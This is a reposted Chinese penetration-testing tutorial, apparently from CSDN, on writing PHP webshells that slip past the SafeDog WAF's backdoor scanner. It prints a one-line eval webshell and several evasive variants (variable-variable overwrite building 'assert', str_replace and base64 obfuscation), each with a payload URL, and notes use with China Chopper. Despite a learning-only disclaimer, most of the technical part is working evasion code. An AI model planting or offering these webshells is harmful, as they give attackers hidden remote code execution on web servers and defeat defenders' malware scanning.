iis服务器助手广告广告
返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >简单手写后门Safedog检测绕过
  • 601
分享到

简单手写后门Safedog检测绕过

phpSafeDogwebshell渗透测试web安全 2023-09-13 13:09:24 601人浏览 八月长安
摘要

今天继续给大家介绍渗透测试相关知识,本文主要内容是简单手写后门Safedog检测绕过。 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负! 再次

今天继续给大家介绍渗透测试相关知识,本文主要内容是简单手写后门Safedog检测绕过。

免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!
再次强调:严禁对未授权设备进行渗透测试

一、Safedog后门扫描原理

SafeDog等WAF软件通常具有网络木马扫描功能,如下所示:
在这里插入图片描述
如果我们在网站中存在一个文件,是PHP一句话木马,如下所示:

phpeval($_POST['a']);?>

那么当SafeDog进行扫描时,就会扫描出该文件,如下所示:
在这里插入图片描述

二、Safedog后门扫描绕过

上述后门之所以被Safedog拦截,是因为SafeDog检测到了eval函数和上传命令结合在了一起,因此,我们需要想办法避免这种写法,同时还能实现后门的功能。
我们可以采用变量覆盖的方式来写后门,后门PHP代码如下所示:

$a=$_GET['x'];$$a=$_GET['y'];$b($_GET['z']);?>

在上述代码中,并没有直接出现assert函数,因此,安全狗扫描也不会查杀,如下所示:
在这里插入图片描述
但是,我们可以采取如下payload:

Http://127.0.0.1/test.php?x=b&y=assert&z=phpinfo();

上述payload执行结果如下所示:
在这里插入图片描述
如果使用菜刀等工具连接,z就是WEBshell的密码。分析上述URL,可以看出,在传入上述参数后,各个变量结果如下:

\$a=b\$\$a=assert

因此$b=assert。因此上述代码变为:

assert(\$_GET['z'])

因此成为了一个webshell。
除了上述方式外,还有一些绕过WAF的思路,例如:
1、字符替换
字符替换是通过字符的替换,来代理敏感字符串,以绕过WAF的检测,相关PHP代码如下所示:

$a=str_replace('123','','as123ser123t');$a($_GET['x']);?>

对该代码的payload为:

http://127.0.0.1/test.php?x=phpinfo();

2、字符编码
字符编码的方式是将敏感字符串进行字符编码后,然后再利用代码进行解码,然后就可以绕过WAF的检测了。相关PHP代码如下所示:

$a=base64_decode("YXNzZXJ0");$a($_GET['x']);?>

对该代码的payload为:

http://127.0.0.1/test.php?x=phpinfo();

以上几种方式,获取不能直接绕过WAF的检测,但是我们可以借鉴这些写法的思想,形成更加复杂的webshell。
原创不易,转载请说明出处:https://blog.csdn.net/weixin_40228200

来源地址:https://blog.csdn.net/weixin_40228200/article/details/128689303

--结束END--

本文标题: 简单手写后门Safedog检测绕过

本文链接: https://www.lsjlt.com/news/405996.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑,方便收藏和打印~

下载Word文档
猜你喜欢
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作